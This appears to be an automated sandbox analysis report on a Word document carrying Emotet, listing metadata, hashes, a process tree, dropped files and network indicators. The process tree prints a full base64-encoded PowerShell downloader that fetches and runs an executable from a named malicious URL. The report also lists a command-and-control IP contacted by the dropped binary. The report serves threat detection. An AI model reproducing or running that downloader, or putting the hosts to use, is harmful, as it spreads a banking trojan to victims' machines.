File name: | IJ-763011-Apr.doc |
Full analysis: | https://app.any.run/tasks/2522a304-549e-4f9b-acb6-c1de3e34922b |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 23, 2019, 18:10:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 23 07:36:00 2019, Last Saved Time/Date: Tue Apr 23 07:36:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 12, Security: 0 |
MD5: | 944A68C7386D746349C8D5C27D9CF400 |
SHA1: | 26468934845C6CB6D981BD1FC047CFE09E15D9A4 |
SHA256: | 43C0DB4B7F256F51B2C99E2C5AFEC802B1C97268B25845297F4B57047FA0DE76 |
SSDEEP: | 3072:i4eOY5CTsdApN2mF/qn6wq0dFiynHFCAGh10ow7n0Z44aJAWDWb:iTbiVqn6hwTl320ow70Z44iAWDWb |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:04:23 06:36:00 |
ModifyDate: | 2019:04:23 06:36:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 12 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 13 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3276 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\IJ-763011-Apr.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3460 | powershell -e JABjAEEAQQBRAEMARwBrAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBjACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBBAF8AQQAnACwAJwB1AEEAQgAnACkALAAnAG8AJwApACkAOwAkAGMAQQBBAEEAYwBfACAAPQAgACcANwA2ADkAJwA7ACQAegBCAEIAQQBBAEIAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEMAJwAsACcAYwBEAEEAJwApACwAJwBHAEEAMQAnACwAJwBiACcAKQA7ACQAVgBjAEEAXwBaAFEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGMAQQBBAEEAYwBfACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAuAGUAeAAnACwAJwBlACcAKQA7ACQAUQBRAG8AQQBRADQAUQBvAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBBAEQAQQAnACwAJwBYAFEAawAnACkAOwAkAEsAVQBBAFEAQgBRAEEAawA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAGAAVABgAC4AVwBFAGAAQgBgAGMATABpAGUATgB0ADsAJABRAEEARwBEAEIAQgA9ACgAIgB7ADcAfQB7ADMAMAB9AHsAOAB9AHsAMgB9AHsAMQA0AH0AewAyADEAfQB7ADQAfQB7ADIAOQB9AHsAMQA2AH0AewAxADkAfQB7ADIANwB9AHsAMgA0AH0AewAyADIAfQB7ADIAMAB9AHsAMgAzAH0AewAwAH0AewA2AH0AewAyADgAfQB7ADIANQB9AHsAMQB9AHsAOQB9AHsAMQA1AH0AewAxADIAfQB7ADEAOAB9AHsAMQAxAH0AewAxADAAfQB7ADEANwB9AHsAMgA2AH0AewAzAH0AewAxADMAfQB7ADUAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAaQBlACcALAAnAGEAdAAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHgAbwBmACcALAAnAHIAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcALwB3AHAAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbwBtACcALAAnAC4AYwAnACkALAAnAGkAbgAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAG4AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAbwBuACcALAAnAHQAZQAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcALQBhAGQAJwAsACcAbQAnACkALAAnAGkAbgAnACkALAAnAFYALwAnACwAJwBuAHQALgAnACwAJwBoAHQAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbgAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAeQBkACcALAAnAGEAYQAnACkAKQAsACcAZAAvACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAuACcALAAnAGcAcgBvACcAKQAsACcAdwAnACwAJwBoACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHQALwBZACcALAAnADYAJwApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAC0AYQBkACcALAAnAG0AaQAnACkALAAnAC8AbQAnACwAJwBuACcAKQAsACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwB3AHcAdwAnACwAJwAvAC8AJwAsACcALgB0ACcAKQAsACcAOAAwAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHQAdABwAHMAOgAnACwAJwBAAGgAJwApACwAJwA4ACcAKQAsACcAegAvACcALAAnAHUAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAYgBlAHIAbQAnACwAJwBlACcAKQAsACcAYQAnACwAJwBhAG4AbAAnACkALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAgACcAcAA6ACcALAAnAEAAaAAnACwAJwB0AHQAJwApACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwB0ACcALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAC8AaAAnACwAJwBwADoALwAnACwAJwBhACcAKQAsACcAdAAnACkALAAoACIAewA2AH0AewAwAH0AewA0AH0AewA1AH0AewAyAH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAHAAJwAsACcALwB3AHAAJwAsACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAbgAnACwAJwBvAHYAJwAsACcAYQAnACwAJwBrAGkAdABvAHMAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALgBjACcALAAnAG8AbQAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwA6AC8ALwAnACwAJwBhACcAKQAsACcAbABvACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcAQABoACcALAAnAHQAdAAnACwAJwAyADcAcABxAC8AJwApACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBoAC8AJwAsACcAYQBVACcAKQAsACcAQABoACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAYgBlACcALAAnAHkAdABvACcALAAnAHAAJwApACwAJwBwAHAAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAGkAbgAvAGMAJwAsACcALQBiACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAG0ALwBjACcALAAnAGcAaQAnACkALAAnAG8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAOAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG0ALwBvACcALAAnAG8AJwApACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAcAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBjACcALAAnAC8AdwBwAC0AJwApACkALAAoACIAewAwAH0AewAxAH0AewA0AH0AewAzAH0AewAyAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAC8ALwAnACwAJwA5ADEAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBhAHAAaAAnACwAJwAyAGcAcgAnACkALAAnAGMAJwAsACcAYwBzAC4AJwAsACcAaQAnACkALAAnAGMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbABDACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnADcAJwAsACcALwBSADEAJwApACkALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAnAHQAcAA6ACcALAAnAGEAcgBlACcALAAnAC8ALwAnACkAKQAuACIAcwBgAHAATABJAHQAIgAoACcAQAAnACkAOwAkAFoAQQBBAFUARABBAEQAQQA9ACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBfACcALAAnAHMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEEAJwAsACcAVQBBAEEAJwApACwAJwB4AG8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABmAFUAQQBVAG8AYwBjAEcAIABpAG4AIAAkAFEAQQBHAEQAQgBCACkAewB0AHIAeQB7ACQASwBVAEEAUQBCAFEAQQBrAC4AIgBEAG8AVwBOAGAAbABvAGAAQQBkAEYASQBgAEwARQAiACgAJABmAFUAQQBVAG8AYwBjAEcALAAgACQAVgBjAEEAXwBaAFEAKQA7ACQAUQBDAFUAUQBrAHcAQgA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAdwA0ACcALAAnAEEAXwAnACkALAAnAEEAJwApACwAJwBiAFEAJwAsACcAQgAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAVgBjAEEAXwBaAFEAKQAuACIATABlAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADgANwAzADUAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAgACQAVgBjAEEAXwBaAFEAOwAkAEUAQQBBAEIAeAB4AEEAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBBAEIAJwAsACcAVQB4AEQAJwApACwAJwBpACcAKQAsACcAbwAnACwAJwBRACcAKQA7AGIAcgBlAGEAawA7ACQARwBVAFgAWgBBAEEAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcATwAnACwAJwBaAFEAQQAnACwAJwBBAEEARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEAQQBBAGsAWABVAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBvAEcAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAQQBRACcALAAnAEQAQQAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1780 | "C:\Users\admin\769.exe" | C:\Users\admin\769.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2104 | --6cf013b8 | C:\Users\admin\769.exe | 769.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2652 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 769.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
608 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
3276 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR62A4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KOT9J4Y3TOE1E3GARFWU.temp | — | |
MD5:— | SHA256:— | |||
3460 | powershell.exe | C:\Users\admin\769.exe | executable | |
MD5:9AC34F1C936EE30512FCDBC36311BB8D | SHA256:E24D216A48831D6AEA667016FAF1C5A0A2DDF47CF95E0A80623BE0DFC3ADA8A6 | |||
2104 | 769.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:9AC34F1C936EE30512FCDBC36311BB8D | SHA256:E24D216A48831D6AEA667016FAF1C5A0A2DDF47CF95E0A80623BE0DFC3ADA8A6 | |||
3276 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\IJ-763011-Apr.doc.LNK | lnk | |
MD5:C3253CAF2E041F97873DB3A94FB9756D | SHA256:EAF9CD16765A711C456AA7D69EC6AE8EF8B336608C05597A4F5D775B2630D82C | |||
3460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3276 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:21AD751A1E2B50BF5CCD1F525B68F075 | SHA256:8F6D6D000ADF6047B0E821F48FD19CF09F15EAE2D8317B354760B8EC336C89B2 | |||
3276 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:65A14A601AF6597AC6E48922957494B4 | SHA256:0E8EE7C820D5510C7AAE1F3C795EAB1CEB347B99887978BB86C8F4DE742165CB | |||
3276 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:2662D422AF27DD0904ECCC811DBD92F1 | SHA256:D3726C49A27652475E8CA9D057018EFE789C1E6F22B4881A8F90827F342793AE | |||
3460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF106e2d.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
608 | soundser.exe | POST | — | 24.150.44.53:80 | http://24.150.44.53/cookies/mult/ | CA | — | — | malicious |
3460 | powershell.exe | GET | 200 | 31.169.92.34:80 | http://arenaaydin.com/wp-admin/m27pq/ | TR | executable | 77.5 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
608 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
3460 | powershell.exe | 31.169.92.34:80 | arenaaydin.com | Netfactor Telekominikasyon Ve Teknoloji Hizmetleri Sanayi Ve Jsc | TR | malicious |
Domain | IP | Reputation |
---|---|---|
arenaaydin.com |
| malicious |